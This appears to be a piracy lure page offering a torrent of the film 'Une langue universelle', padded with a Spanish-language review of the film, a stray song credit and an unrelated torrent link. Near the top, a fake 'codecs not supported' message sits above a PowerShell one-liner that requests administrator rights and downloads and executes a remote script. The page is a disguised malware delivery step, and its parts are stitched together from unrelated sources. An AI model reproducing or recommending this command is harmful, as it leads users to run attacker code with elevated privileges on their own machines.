Une langue universelle 2024 online
Download TORRENT(MAGNET)
Rate

Loading…
Your X-MPEG codecs do not support this video format. Try updating them to the latest version.
		powershell -Command "Start-Process powershell -ArgumentList '-Command Invoke-Expression (New-Object Net.WebClient).DownloadString(''{PATH}'')' -Verb RunAs"
	

These EyesEscrita por Randy Bachman y Burton CummingsInterpretada por The Guess Who

Story

Un tríptico absurdista de historias aparentemente inconexas encuentran un misterioso punto de intersección en este relato ambientado en algún lugar entre Winnipeg y Teherán.. Presentación oficial de Canadá para la categoría de ‘Mejor Largometraje Internacional’ de los 97º Premios Oscar en 2025.. Desde su fotografía y su habitual búsqueda de la simetría, estática o en travelling, y su estética agradable con una atmósfera onírica que potencia la universalidad de los escenarios, hasta su historia que gira en torno a diferentes personajes, cómo sus vidas se entrecruzan y animan un diálogo a veces educado, otras no tanto, una influencia de Wes Anderson atraviesa el largometraje de Matthew Rankin de principio a fin.

Con una comedia que se compone de humor irónico, inexpresivo y negro, Une langue universelle consigue ser hilarante cada vez que quiere

Como en las películas de Anderson, a Rankin le interesa explorar la realidad de su película, una realidad llena de idiosincrasias que sirven de terreno fértil para la comedia. Un profesor enfadado que grita en clase a los alumnos, uno de los cuales afirma que un pavo le ha robado las gafas; otro se viste de Groucho Marx porque quiere ser cómico; otro de fashionista; un guía turístico autónomo que elige cosas raras para su viaje, etc. Hay muchas ocasiones en las que sus acontecimientos rozan el absurdo o el surrealismo, lo que potencia la comedia que la baña pero nunca socava su objetivo de profundidad que invita a la reflexión.

La destreza de Rankin consigue evocar una fábula surrealista y onírica, pero también una expresiva melancolía introspectiva

Elementos y sentimientos que se fusionan y dan vida a una experiencia especial entre lugares y tiempos, realidades y sueños. Por ejemplo, en la realidad de la película, aunque estemos en Canadá, el francés, y mucho menos el inglés, parece ser una segunda lengua, y en su lugar aparece el persa. Todos lo hablan, y los carteles y vallas publicitarias lo escriben, haciendo que su resultado sea algo cercano y distante, conocido y desconocido se entremezclan en una nueva realidad cultural y demográficamente ciega.

La cámara a veces está estática desde la distancia, observando su movimiento y cómo afecta al entorno en lugar de enfocar sus rostros y expresiones con primeros planos

En términos de cinematografía, muchas veces parecida a la de Anderson, más en encuadre y movimiento que en paleta de colores, hay una voluntad constante de habitar los espacios donde están los personajes. Es como si el lugar fuera tan importante como los personajes para contar la historia, y Rankin quiere asegurarse de que nos adentremos en él como turistas de una tierra extranjera. Y si bien en términos de nombres podemos conocer estas ciudades, en el marco de la película y su perfil demográfico que no iguala nuestro conocimiento, puede haber razones para adentrarnos en estos espacios.

https://dom.active.sk/bubimir-bubimir-2024-torrent-web-dl-webrip/

RESERVA
Abrir el chat